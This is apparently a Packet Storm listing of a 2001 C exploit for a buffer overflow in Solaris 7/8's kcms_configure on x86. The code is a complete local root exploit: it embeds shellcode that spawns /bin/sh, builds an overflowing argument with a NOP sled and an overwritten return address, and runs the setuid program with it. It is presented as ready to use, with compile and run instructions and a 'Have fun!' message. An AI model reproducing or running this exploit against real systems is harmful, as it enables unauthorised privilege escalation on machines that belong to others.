Solaris 7/8 kcms_configure command line buffer overflow on both sparc/Intel platforms.
060830798eeb4bfc82866e4a2ef7eba72abfa93248e51af9d583026e70c7d476/*
* Solaris 7/8 kcms_configure command line buffer overflow on both sparc/Intel platforms
*
* root exploit for x86
*
* Thanks to the signals handler. It doesn't make life easier, does it?
*
* Compile: $gcc -o ex kcms_configure_ex.c
* Run: $./ex xserver:0.0 [adjustment]
*
* Default should work.
*
* User should take resposibility to use this code.
*
* virtualcat (virtualcat@xfocus.org)
*
* http://www.xfocus.org
*
* 06-July-2001
*
*/
#include <stdio.h>
#define RET_DIS 1025 /* Displacement to overwrite the return address */
/* 1002 is the original magic */
/* Believe or not? - Due to the kcms_configure's */
/* signal handling, it ends up with this number ;) */
#define NOP 0x90 /* NOOPs */
#define NNOP 500 /* Number of NOOPs - To make life much easier */
char shellCode[] = /* Solaris x86 shellcode by cheeze wizz */
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
int get_esp()
{
__asm__("mov %esp, %eax");
}
void usage(const char* cmd)
{
printf("Uasge: %s xserver:DISPLAY [adjustment]\n\n", cmd);
printf(" xserver -> X window server's ip\n");
printf(" DISPLAY -> X window server's display\n");
printf(" adjustment -> Default(0) should work, or increase/decrease by 4\n\n");
printf(" eg. $./xx 192.168.0.88:0.0\n");
printf(" $./xx 192.168.0.88:0.0 -16\n");
exit(1);
}
int main(int argc, char **argv)
{
/* Just to make it easy to understand */
char* charPtr = NULL;
char* bufferPtr = NULL;
int* intPtr = NULL;
int shellCodeLength = strlen(shellCode);
int bufferSize = RET_DIS + 4 + NNOP + shellCodeLength + 1;
int retAddr = 0;
int adjustment = 0;
int i;
int esp = get_esp();
if(argc >= 3)
{
adjustment = atoi(argv[2]);
}
else
{
if(argc == 1)
{
usage(argv[0]);
}
}
retAddr = esp + adjustment;
bufferPtr = (char *) malloc(bufferSize);
if(bufferPtr != NULL)
{
/* Fill the whole buffer with 'A' */
memset((char *)bufferPtr, 0x41, bufferSize);
/* Butt in our return address */
intPtr = (int *) (bufferPtr + RET_DIS);
*intPtr++ = retAddr;
charPtr = (char *) intPtr;
/* To increase the probabilty to hit the jackpot */
for(i=0; i<NNOP; i++)
{
*charPtr++ = NOP;
}
/* Butt in the shell code */
for(i=0; i<shellCodeLength; i++)
{
*charPtr++ = shellCode[i];
}
/* Null terminated - Not necessary but nice to have */
*charPtr = 0;
printf("esp=0x%.8x, adjustment=%d, jump to 0x%.8x. Have fun!\n", esp, adjustment, retAddr);
/* Try to hit the jackpot */
execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-d", argv[1], bufferPtr, NULL);
printf("Doesn't work! :(\n");
}
else
{
printf("No more free memory!\n");
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed